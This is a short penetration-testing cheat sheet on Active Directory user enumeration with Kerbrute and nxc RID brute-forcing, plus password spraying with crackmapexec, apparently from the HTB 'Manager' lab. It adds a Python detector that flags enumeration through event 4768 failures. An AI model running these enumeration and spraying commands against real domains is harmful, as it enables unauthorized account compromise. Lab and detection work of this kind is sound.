Kerbrute

Overview

Kerbrute can brute-force domain usernames. This is valuable from an information-gathering perspective and can lead to some quick wins.

After finding some usernames, you can password spray those accounts using their usernames as passwords. This is very common in the real world.

Kerbrute Attack

This can also be done by brute-forcing RIDs using nxc:

nxc smb 10.10.11.236 -u anonymous -p "" --rid-brute 10000

Enumerate for users

kerbrute userenum -d PNPT.LOCAL users.txt --dc DC.PNPT.LOCAL

/usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

HTB machine Manager
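
From the defender's side, this enumeration is visible on the domain controller: with failure auditing enabled for the Kerberos Authentication Service, a TGT request for a nonexistent account is logged as event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The sketch below is an added example, not part of the original notes; the event dictionaries are constructed samples, and the window and threshold are assumed values to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

PRINCIPAL_UNKNOWN = "0x6"       # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such account
WINDOW = timedelta(minutes=5)   # assumed detection window, tune per environment
MIN_UNKNOWN_USERS = 5           # assumed threshold of distinct unknown names

def find_enum_sources(events, window=WINDOW, threshold=MIN_UNKNOWN_USERS):
    """Map source IP -> unknown usernames it requested, for every source that
    asked for `threshold` or more distinct unknown principals inside `window`."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4768 and ev["Status"].lower() == PRINCIPAL_UNKNOWN:
            ip = ev["IpAddress"].split("::ffff:")[-1]  # strip IPv4-mapped prefix
            when = datetime.fromisoformat(ev["TimeCreated"])
            by_src[ip].append((when, ev["TargetUserName"].lower()))
    flagged = {}
    for ip, hits in by_src.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            if len({u for _, u in hits[start:end + 1]}) >= threshold:
                flagged[ip] = sorted({u for _, u in hits})
                break
    return flagged

def _ev(ts, user, ip, status):
    return {"EventID": 4768, "TimeCreated": ts, "TargetUserName": user,
            "IpAddress": ip, "Status": status}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    _ev(f"2024-01-01T10:00:0{i}", name, "::ffff:10.10.14.7", "0x6")
    for i, name in enumerate(["admin", "backup", "guest1", "svc_sql", "test", "helpdesk"])
] + [
    _ev("2024-01-01T09:00:00", "jsmith", "::ffff:10.0.0.50", "0x0"),  # normal logon
    _ev("2024-01-01T09:05:00", "jsmiht", "::ffff:10.0.0.50", "0x6"),  # one typo
    _ev("2024-01-01T11:30:00", "jsmtih", "::ffff:10.0.0.50", "0x6"),  # typo, hours later
]

if __name__ == "__main__":
    for ip, names in find_enum_sources(SAMPLE_EVENTS).items():
        print(f"possible Kerberos user enumeration from {ip}: {len(names)} unknown names")
```

A single mistyped username produces the same event, so the signal is the number of distinct unknown names from one source in a short window, not any individual failure.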

Password spray using --no-brute to avoid account lockout

crackmapexec smb 192.168.1.129 -u users.txt -p users.txt --no-brute -d manager.htb  
HTB machine Manager
